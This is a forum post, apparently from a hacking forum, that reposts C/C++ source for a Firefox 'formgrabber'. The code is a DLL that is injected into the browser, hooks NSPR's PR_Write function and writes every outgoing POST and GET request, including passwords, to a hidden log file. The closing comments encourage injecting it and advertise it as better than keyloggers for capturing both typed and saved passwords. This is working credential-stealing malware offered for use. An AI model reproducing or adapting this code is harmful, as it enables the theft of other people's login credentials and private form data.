Jump to content
Nytro

[C] FireFox Formgrabber

By Nytro, in Programare

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[C] FireFox Formgrabber

Author: datemme

Heres an example for a Firefox Formgrabber:

dllmain:

#include "hookdll.cpp"

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		Funktion();
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

HookDll.cpp :

// hookdll.cpp : Definiert die exportierten Funktionen für die DLL-Anwendung.

#include <iostream>
#include <fstream>
using namespace std;

#pragma once
#include <windows.h>
#include <prio.h>
#pragma comment (lib, "nspr4.lib")
BYTE hook[6];

DWORD HookFunction(LPCSTR lpModule, LPCSTR lpFuncName, LPVOID lpFunction, unsigned char *lpBackup)
{
	DWORD dwAddr = (DWORD)GetProcAddress(GetModuleHandle(lpModule), lpFuncName);
	BYTE jmp[6] = { 0xe9,	//jmp
		0x00, 0x00, 0x00, 0x00,	//address
		0xc3
	};	//retn

	ReadProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, lpBackup, 6, 0);

	DWORD dwCalc = ((DWORD)lpFunction - dwAddr - 5);	//((to)-(from)-5)

	memcpy(&jmp[1], &dwCalc, 4);	//build the jmp

	WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, jmp, 6, 0);

	return dwAddr;
}

BOOL UnHookFunction(LPCSTR lpModule, LPCSTR lpFuncName, unsigned char *lpBackup)
{
	DWORD dwAddr = (DWORD)GetProcAddress(GetModuleHandle(lpModule), lpFuncName);

	if (WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, lpBackup, 6, 0))
		return TRUE;
	return FALSE;
}

int WriteLog(const char * Filename,char * Text)
{
     ofstream File;                   //Names File as ofstream (for output to file)                               //Closes file
     File.open(Filename,ios::app);    //Reopens file to append, if you just used ios::out again, it would erase everything and rewrite the file
     File << Text;                    //Outputs to file
     File.close();                    //Closes opened file
	 SetFileAttributes( Filename , FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_NORMAL );
     return 1;

}

PRInt32 cPR_Write(
PRFileDesc *fd,
const void *buf,
PRInt32 amount)
{
UnHookFunction("nspr4.dll", "PR_Write", hook);
PRInt32 hResult = PR_Write(fd,buf,amount);
if(strncmp((LPCSTR)buf,"POST",lstrlen("POST"))==0){WriteLog("test.txt",(char*)buf);};
if(strncmp((LPCSTR)buf,"GET",lstrlen("GET"))==0){WriteLog("test.txt",(char*)buf);};

HookFunction("nspr4.dll", "PR_Write", cPR_Write, hook);
return hResult;
}


extern "C" void __declspec(dllexport) Funktion()
{
	HookFunction("nspr4.dll", "PR_Write", cPR_Write, hook);
}

//U need to download Gecko SDK (google it) and set the additional Include path und Lib path in project details

//vc++ 2008 compiled in multibyte mode

//inject it in FF and have Fun !!!

//can be very usefull if u "forgot" your password on a website

//advantage compared to Pw-Grabbers and Keylogges: logs manualy inserted passwords and saved passwords both

//you can ofcourse filter for special tags with slightly modification

datemme

Sursa: FireFox Formgrabber

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...